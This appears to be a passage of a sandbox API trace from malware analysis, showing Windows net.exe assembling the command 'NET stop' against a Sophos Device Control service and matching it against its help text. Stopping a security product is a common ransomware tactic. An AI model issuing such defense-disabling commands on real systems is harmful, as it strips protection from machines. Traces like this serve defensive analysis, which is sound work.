[0037.506] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc67, dwLanguageId=0x0, lpBuffer=0x29f7f4, nSize=0x0, Arguments=0x29f7f0 | out: lpBuffer="㽈[ꔺ瓡") returned 0x1c [0037.506] wcstok (in: _String="NAMES$\r\nSYNTAX$\r\nSERVICES$\r\n", _Delimiter="$", _Context=0x3d6 | out: _String="NAMES", _Context=0x3d6) returned="NAMES" [0037.506] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSYNTAX" [0037.506] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSERVICES" [0037.507] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\n" [0037.507] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0037.507] wcsspn (_String="NAMES", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0037.507] _wcsicmp (_String1="stop", _String2="NAMES") returned 5 [0037.507] wcsspn (_String="\r\nSYNTAX", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0037.507] _wcsicmp (_String1="stop", _String2="SYNTAX") returned -5 [0037.507] wcsspn (_String="\r\nSERVICES", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0037.507] _wcsicmp (_String1="stop", _String2="SERVICES") returned 15 [0037.507] wcscpy_s (in: _Destination=0xeda4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0037.507] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74710000 [0037.508] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74710000, dwMessageId=0x111d, dwLanguageId=0x0, lpBuffer=0xedb338, nSize=0x800, Arguments=0xed9dd8 | out: lpBuffer="The syntax of this command is:\r\n") returned 0x20 [0037.508] GetFileType (hFile=0x26c) returned 0x3 [0037.508] LocalAlloc (uFlags=0x0, uBytes=0x40) returned 0x5b4218 [0037.508] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The syntax of this command is:\r\n", cchWideChar=32, lpMultiByteStr=0x5b4218, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The syntax of this command is:\r\n", lpUsedDefaultChar=0x0) returned 32 [0037.508] WriteFile (in: hFile=0x26c, lpBuffer=0x5b4218*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x29f7d4, lpOverlapped=0x0 | out: lpBuffer=0x5b4218*, lpNumberOfBytesWritten=0x29f7d4*=0x20, lpOverlapped=0x0) returned 1 [0037.508] LocalFree (hMem=0x5b4218) returned 0x0 [0037.508] GetFileType (hFile=0x26c) returned 0x3 [0037.508] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x5b3da8 [0037.508] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x5b3da8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n[", lpUsedDefaultChar=0x0) returned 2 [0037.508] WriteFile (in: hFile=0x26c, lpBuffer=0x5b3da8*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x29f7d4, lpOverlapped=0x0 | out: lpBuffer=0x5b3da8*, lpNumberOfBytesWritten=0x29f7d4*=0x2, lpOverlapped=0x0) returned 1 [0037.508] LocalFree (hMem=0x5b3da8) returned 0x0 [0037.508] wcscpy_s (in: _Destination=0x29f88c, _SizeInWords=0x200, _Source="NET" | out: _Destination="NET") returned 0x0 [0037.509] wcsncat_s (in: _Destination="NET", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET ") returned 0x0 [0037.509] wcsncat_s (in: _Destination="NET ", _SizeInWords=0x200, _Source="stop", _MaxCount=0xffffffff | out: _Destination="NET stop") returned 0x0 [0037.509] wcsncat_s (in: _Destination="NET stop", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ") returned 0x0 [0037.509] wcsncat_s (in: _Destination="NET stop ", _SizeInWords=0x200, _Source="ΓÇ£Sophos", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos") returned 0x0 [0037.509] wcsncat_s (in: _Destination="NET stop ΓÇ£Sophos", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos ") returned 0x0 [0037.509] wcsncat_s (in: _Destination="NET stop ΓÇ£Sophos ", _SizeInWords=0x200, _Source="Device", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos Device") returned 0x0 [0037.509] wcsncat_s (in: _Destination="NET stop ΓÇ£Sophos Device", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos Device ") returned 0x0 [0037.509] wcsncat_s (in: _Destination="NET stop ΓÇ£Sophos Device ", _SizeInWords=0x200, _Source="Control", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos Device Control") returned 0x0 [0037.509] wcsncat_s (in: _Destination="NET stop ΓÇ£Sophos Device Control", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos Device Control ") returned 0x0 [0037.509] wcsncat_s (in: _Destination="NET stop ΓÇ£Sophos Device Control ", _SizeInWords=0x200, _Source="ServiceΓÇ¥", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos Device Control ServiceΓÇ¥") returned 0x0 [0037.509] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="墀[댸í)Ѱíɬ") returned 0xad [0037.509] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control ServiceΓÇ¥", _String2="NET ACCOUNTS\r\n[/FORCELOGOFF:{minutes | NO}] ", _MaxCount=0x2c) returned 18 [0037.509] LocalFree (hMem=0x5b5880) returned 0x0 [0037.509] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)墀[)") returned 0x2e [0037.509] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control ServiceΓÇ¥", _String2="NET COMPUTER\r\n\\\\computername {/ADD | /DEL}\r\n", _MaxCount=0x2c) returned 16 [0037.509] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.509] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="墀[⡋瓢)㾐[)") returned 0x7d [0037.509] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control ServiceΓÇ¥", _String2="NET CONFIG SERVER\r\n[/AUTODISCONNECT:time]\r\n ", _MaxCount=0x2c) returned 16 [0037.509] LocalFree (hMem=0x5b5880) returned 0x0 [0037.509] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)墀[)") returned 0x26 [0037.509] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control ServiceΓÇ¥", _String2="NET CONFIG\r\n[SERVER | WORKSTATION]\r\n\r\n", _MaxCount=0x2c) returned 16 [0037.509] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.509] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x19 [0037.509] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control ServiceΓÇ¥", _String2="NET CONTINUE\r\nservice\r\n\r\n", _MaxCount=0x2c) returned 16 [0037.509] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.509] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x1b [0037.509] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control ServiceΓÇ¥", _String2="NET FILE\r\n[id [/CLOSE]]\r\n\r\n", _MaxCount=0x2c) returned 13 [0037.509] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.509] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="墀[⡋瓢)㾐[)") returned 0xbe [0037.509] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control ServiceΓÇ¥", _String2="NET GROUP\r\n[groupname [/COMMENT:\"text\"]] [/D", _MaxCount=0x2c) returned 12 [0037.509] LocalFree (hMem=0x5b5880) returned 0x0 [0037.509] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)墀[)") returned 0x33 [0037.510] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control ServiceΓÇ¥", _String2="NET HELP\r\ncommand\r\n -or-\r\nNET command /H", _MaxCount=0x2c) returned 11 [0037.510] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.510] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x19 [0037.510] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control ServiceΓÇ¥", _String2="NET HELPMSG\r\nmessage#\r\n\r\n", _MaxCount=0x2c) returned 11 [0037.510] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.510] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="墀[⡋瓢)㾐[)") returned 0xc1 [0037.510] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control ServiceΓÇ¥", _String2="NET LOCALGROUP\r\n[groupname [/COMMENT:\"text\"]", _MaxCount=0x2c) returned 7 [0037.510] LocalFree (hMem=0x5b5880) returned 0x0 [0037.510] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)墀[)") returned 0x16 [0037.510] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control ServiceΓÇ¥", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x2c) returned 3 [0037.510] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.510] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x33 [0037.510] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control ServiceΓÇ¥", _String2="NET SESSION\r\n[\\\\computername] [/DELETE] [/LI", _MaxCount=0x2c) returned 15 [0037.510] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.510] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="墀[⡋瓢)㾐[)") returned 0x234 [0037.510] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control ServiceΓÇ¥", _String2="NET SHARE\r\nsharename\r\n sharename=dr", _MaxCount=0x2c) returned 12 [0037.510] LocalFree (hMem=0x5b5880) returned 0x0 [0037.510] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)墀[)") returned 0x13 [0037.510] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control ServiceΓÇ¥", _String2="NET START BROWSER\r\n", _MaxCount=0x2c) returned 14 [0037.510] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.510] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x14 [0037.510] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control ServiceΓÇ¥", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x2c) returned 14 [0037.510] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.510] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x14 [0037.510] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control ServiceΓÇ¥", _String2="NET START EVENTLOG\r\n", _MaxCount=0x2c) returned 14 [0037.510] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.510] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x15 [0037.510] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control ServiceΓÇ¥", _String2="NET START MESSENGER\r\n", _MaxCount=0x2c) returned 14 [0037.510] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.511] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x15 [0037.511] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control ServiceΓÇ¥", _String2="NET START NET LOGON\r\n", _MaxCount=0x2c) returned 14 [0037.511] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.511] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x16 [0037.511] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control ServiceΓÇ¥", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x2c) returned 14 [0037.511] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.511] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x11 [0037.511] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control ServiceΓÇ¥", _String2="NET START RPCSS\r\n", _MaxCount=0x2c) returned 14 [0037.511] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.511] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x14 [0037.511] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control ServiceΓÇ¥", _String2="NET START SCHEDULE\r\n", _MaxCount=0x2c) returned 14 [0037.511] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.511] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x12 [0037.511] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control ServiceΓÇ¥", _String2="NET START SERVER\r\n", _MaxCount=0x2c) returned 14 [0037.511] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.511] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0xf [0037.511] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control ServiceΓÇ¥", _String2="NET START UPS\r\n", _MaxCount=0x2c) returned 14 [0037.511] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.511] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x17 [0037.511] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control ServiceΓÇ¥", _String2="NET START WORKSTATION\r\n", _MaxCount=0x2c) returned 14 [0037.511] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.511] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x18 [0037.511] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control ServiceΓÇ¥", _String2="NET START\r\n[service]\r\n\r\n", _MaxCount=0x2c) returned 14 [0037.511] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.511] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x2a [0037.511] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control ServiceΓÇ¥", _String2="NET STATISTICS\r\n[WORKSTATION | SERVER]\r\n\r\n", _MaxCount=0x2c) returned 14 [0037.511] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.511] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x15 [0037.511] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control ServiceΓÇ¥", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x2c) returned 19 [0037.511] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.511] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="墀[⡋瓢)㾐[)") returned 0x58 [0037.511] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control ServiceΓÇ¥", _String2="NET TIME\r\n\r\n[\\\\computername | /DOMAIN[:domai", _MaxCount=0x2c) returned -1 [0037.511] LocalFree (hMem=0x5b5880) returned 0x0 [0037.511] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="墀[⡋瓢)墀[)") returned 0x184 [0037.511] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control ServiceΓÇ¥", _String2="NET USE\r\n[devicename | *] [\\\\computername\\sh", _MaxCount=0x2c) returned -2 [0037.511] LocalFree (hMem=0x5b5880) returned 0x0 [0037.512] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="墀[⡋瓢)墀[)") returned 0xc7 [0037.512] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control ServiceΓÇ¥", _String2="NET USER\r\n[username [password | *] [options]", _MaxCount=0x2c) returned -2 [0037.512] LocalFree (hMem=0x5b5880) returned 0x0 [0037.512] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="墀[⡋瓢)墀[)") returned 0x47 [0037.512] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control ServiceΓÇ¥", _String2="NET VIEW\r\n[\\\\computername [/CACHE] | [/ALL] ", _MaxCount=0x2c) returned -3 [0037.512] LocalFree (hMem=0x5b5880) returned 0x0 [0037.512] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="墀[⡋瓢)墀[)") returned 0xc2 [0037.512] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control ServiceΓÇ¥", _String2="NET\r\n [ ACCOUNTS | COMPUTER | CONFIG | CO", _MaxCount=0x2c) returned 19 [0037.512] LocalFree (hMem=0x5b5880) returned 0x0 [0037.512] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="墀[⡋瓢)墀[)") returned 0x319 [0037.512] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control ServiceΓÇ¥", _String2="SERVICES\r\nNET START can be used to start ser", _MaxCount=0x2c) returned -5 [0037.512] LocalFree (hMem=0x5b5880) returned 0x0 [0037.512] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="墀[⡋瓢)墀[)") returned 0x483 [0037.512] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control ServiceΓÇ¥", _String2="SYNTAX\r\nThe following conventions are used t", _MaxCount=0x2c) returned -5 [0037.512] LocalFree (hMem=0x5b5880) returned 0x0 [0037.512] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="墀[⡋瓢)墀[)") returned 0xa86 [0037.512] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control ServiceΓÇ¥", _String2="NAMES\r\nThe following types of names are used", _MaxCount=0x2c) returned 4 [0037.512] LocalFree (hMem=0x5b5880) returned 0x0 [0037.512] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="墀[⡋瓢)墀[)") returned 0x54 [0037.512] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control ServiceΓÇ¥", _String2="\r\nFor more information on tools see the comm", _MaxCount=0x2c) returned 97 [0037.512] LocalFree (hMem=0x5b5880) returned 0x0 [0037.512] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="墀[⡋瓢)墀[)") returned 0xad [0037.512] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control", _String2="NET ACCOUNTS\r\n[/FORCELOGOFF:{minu", _MaxCount=0x21) returned 18 [0037.512] LocalFree (hMem=0x5b5880) returned 0x0 [0037.512] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)墀[)") returned 0x2e [0037.512] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control", _String2="NET COMPUTER\r\n\\\\computername {/AD", _MaxCount=0x21) returned 16 [0037.512] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.513] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="墀[⡋瓢)㾐[)") returned 0x7d [0037.513] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control", _String2="NET CONFIG SERVER\r\n[/AUTODISCONNE", _MaxCount=0x21) returned 16 [0037.513] LocalFree (hMem=0x5b5880) returned 0x0 [0037.513] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)墀[)") returned 0x26 [0037.513] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control", _String2="NET CONFIG\r\n[SERVER | WORKSTATION", _MaxCount=0x21) returned 16 [0037.513] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.513] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x19 [0037.513] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control", _String2="NET CONTINUE\r\nservice\r\n\r\n", _MaxCount=0x21) returned 16 [0037.513] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.513] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x1b [0037.513] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control", _String2="NET FILE\r\n[id [/CLOSE]]\r\n\r\n", _MaxCount=0x21) returned 13 [0037.513] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.513] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="墀[⡋瓢)㾐[)") returned 0xbe [0037.513] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control", _String2="NET GROUP\r\n[groupname [/COMMENT:\"", _MaxCount=0x21) returned 12 [0037.513] LocalFree (hMem=0x5b5880) returned 0x0 [0037.513] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)墀[)") returned 0x33 [0037.513] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control", _String2="NET HELP\r\ncommand\r\n -or-\r\nNET", _MaxCount=0x21) returned 11 [0037.513] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.513] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x19 [0037.513] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control", _String2="NET HELPMSG\r\nmessage#\r\n\r\n", _MaxCount=0x21) returned 11 [0037.513] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.513] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="墀[⡋瓢)㾐[)") returned 0xc1 [0037.513] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control", _String2="NET LOCALGROUP\r\n[groupname [/COMM", _MaxCount=0x21) returned 7 [0037.513] LocalFree (hMem=0x5b5880) returned 0x0 [0037.513] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)墀[)") returned 0x16 [0037.513] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x21) returned 3 [0037.513] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.513] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x33 [0037.513] _wcsnicmp (_String1="NET stop 